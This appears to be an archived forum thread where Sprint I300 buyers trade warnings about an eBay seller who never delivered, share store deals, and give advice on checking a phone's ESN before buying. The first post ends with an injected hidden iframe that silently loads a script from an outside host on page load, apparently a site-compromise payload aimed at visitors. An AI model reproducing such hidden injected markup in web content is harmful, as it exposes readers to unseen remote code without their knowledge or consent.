hey.....Ima new member & not sure what the rules are. Can I post a warning re: a specific dealer on EBay supposedly selling I300's?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
i dont see a problem.. just dont dogg the guy out.. if you have some information that could help someone from getting a bad phone or service, then post. but this is not a flaming board... (no matter what someone else tells ya.. )
thanks Marc, I'm not typically a flamer & I won't beat him up too much but I've gotten a lot of good info here & would hate to see someone else make the same mistake.
I'll give the main board the high level & if anyone is thinking about dealing with this Co., private me first please.
The company is Network Wireless, Ebay dealer with their own e-store there. They do not deliver, do not answer email, refused to initiate a refund (the seller must with EBay's billing agent BillPoint). They told me twice that they had the phone in hand & tracking info was on the way....two weeks & several un-answered emails later I registered "negative feedback" on EBay for the transaction and the guy surfaces in email to give me a hard time for posting negative feedback ( which 6-7 others had also lately by the way) & that he didn't have the phone & wouldn't initiate a refund. BillPoint's grievance procs call for waiting a month see if the seller delivers...hmmm... Luckily, when I called my bank, they said they would credit the $399 and go after him themselves. The worst part was that it my first time on EBay (which is why I wasn't bright enough to read the feedback that isn't immediately apparent). You wouldn't think these sellers would be able to make a living banking your money for a month til da grievance police made em pay up..... so wuts up wi dat?...sowwy, yu got the unabridged version after all....winds me up to talk about it cuz I WANT THAT PHONE...yu guys have me all fired up (might wait for the 330 now) thanks fopr listenin, DON"T DEAL WITH THAT &^^%$## seller, & thanks for all the posts!!!
If you're a new subscriber to Sprint you can get the phone for less than $399 if I'm not mistaken. I know you can get it for at $400 at the most with a 2 year contract or something liuke that.
HEY EVERYONE CHIME IN!!! We've got to help our friend here find an I300
I got mine at Circuit City last weekend w/ this deal:
buy $499 phone get:
$50 rebate to become a new Sprint customer
$150 Palm m105 sent to me for free when I send in my first cell bill because I bought a "Sprint phone costing over $149"
No contracts or anything required, I signed up for Sprint service when I got home.
BTW, the Sprint website had the wrong programming instructions for the '300. I had to call the crappy automated service to get it setup, I like the response when you say "I'd like to talk to a REAL PERSON" to which the automated system (Claire?) responds, "Okay, but you know I can help you with, blah blah blah" then you have to yell at it again.
With Suncom/AT&T, customer service is answered IMMEDIATELY, by a real person at no charge. (Sprint is $3 to talk to a person).
wow..... haven't checked circuit city. But I think the deal at the other Sprint dealers now is $499 with a Sprint sponsored $50 rebate but the Sprint site doesn't mention the rebate. At any rate, I'm startin to think that 8 - 16 upgrade with the 330 may be worth waitin for. Not to mention that "hour-glass" shape and black rubber grips........gawd.....I might sleep with it.
Search the members for his email address. I am referring to the deals offered by Sprint through their 2 year business contracts. Check em out. Man I better not be paying $3 per call for my calls to Sprint while their site was down.
I just got my I300 from Ebay and had a good experience. I won the bid at $375 (new, sealed in the box w/ extra battery, stylus, case and cradle) and paid a bit extra for 3 day shipping. It arrived in 3 days. I got on Sprint's website and signed up. I never needed to talk to a human. My phone was working that night. There were extra instructions on the web for the setup but at the beginning of the procedure, Sprint says that if there are extra instructions, you can probably just ignore them as some models may be a bit different. I had no trouble with Ebay or the Sprint website. I was quite impressed.
Also, before buying the phone, I called Sprint and spoke (free) to a customer service rep who explained the wireless plans to me.
I just got my I300 on wednesday a guy called kmaintl and had no problems with the transaction. Alot of prople buy these phones from this guy from $339 to $349. I won mine for $354. By the way what's the URL to the auction that you had problems with or the iser ID? maybe we can investigate and get to the bottom of this.
I'm new to this forum so please bear with me. I think I'm about to purchase an i300 on ebay but this guy is offering a discount that is too good to be true. He says that he is a Sprint rep and that he got a bunch of 10 phones from his boss to sell as a promo. I'm wondering if anyone had any dealings with someone named "Prince" (real or ebay name). Sorry if this is not appropriate to the list. I really want to get this, but I don't want to get screwed. Also, he says that I must activate this phone with Sprint but that there is no term requirement so I can cancel the day I get it and then transfer my existing service to it. Does this sound possible? Thanks.
What's your existing carrier? If it doesn't support CDMA, Sprint and Verizon are the only ones that supply CDMA networks, then you phone won't work. If you already have a sprint phone it won't be no problem. I was real easy to set up when I got my phone. just went to the website typed in the info and my phone was activated in about an hour. But remember to look througly thru this guy's feedback and see what other stuff he sold.
Thanks for your reply Eman. My existing carrier is Sprint so the transfer shouldn't be a problem. The guy has good ebay feedback but he has only sold a few items and the most recent one was in 2001. I was just wondering if Sprint does this kind of stuff -- give their reps phone to sell off ebay or any other way. I don't want to end up with a "hot" or otherwise comprised phone only to call Sprint to transfer and then find out that I cannot because of these kinds of problems. I also wanted to know if Sprint has any plan contracts that have no term requirements. The ebay seller said I could receive the activated phone and cancel the same day with no fees but I never heard of such a thing with Sprint.
I've e-mailed SprintPCSguy about this since he works for the company, but if anyone out there has answers and advice let me know! Thanks.
cool...glad someone had good experiences with EBAY sellers. $354 is tempting but I'm looking elsewhere too. Curious that both full-service SprintPCS stores close to me are out of the phone & no definite ETA. hmmmmmm....is the 330 close????...hahah
grab the esn form the guy so you can check it out with sprint. he should have no trouble giving you the esn if the phone is clean and has not been flagged "stolen" or whatever... if he asks why you want the esn, explain to him that sometimes when things are too good to be tru they susally are and you want to make sure you are making a informed buy and not getting "scammed"... i would do that before i buy a new phone from ebay...
Hey thanks for these response. The guy said the phone is coming directly from Sprint so he doesn't have the esn number. He seems honest and replies to all my e-mails. Anyway, if anyone has more advice more me, please keep it coming!
Oh, yeah and do you guys think Spring is selling these at such a low price because they are clearing out of the new model?
sure seems like they may be...they're gettin hard to find through they're premium stores, might be givin the middle men a chance to make some bucks before they get massively discounted in prep for the 330..... anyone from Sprint care to comment???
well i dont like getting things from folks who dont even have the stuff in their possesison.. if hes getting them from sprint then they should give him the esn and whatever else you need to know... you need to be assured that these phones are on the level some kind of way.. not just by *his* word...
so is he saying you pay him and he tells someone at some other location to ship unit out to your address? so youve got 2 middlemen? i dont like it and to make a good sale you have to be on your p's and q's... if you were getting it for 100 bucks then thats not much of a loss if its a shabby deal, but for 350 ducketts of my hard earned money, id make him work for it!
get something in writing or make sure you read all the fine print.
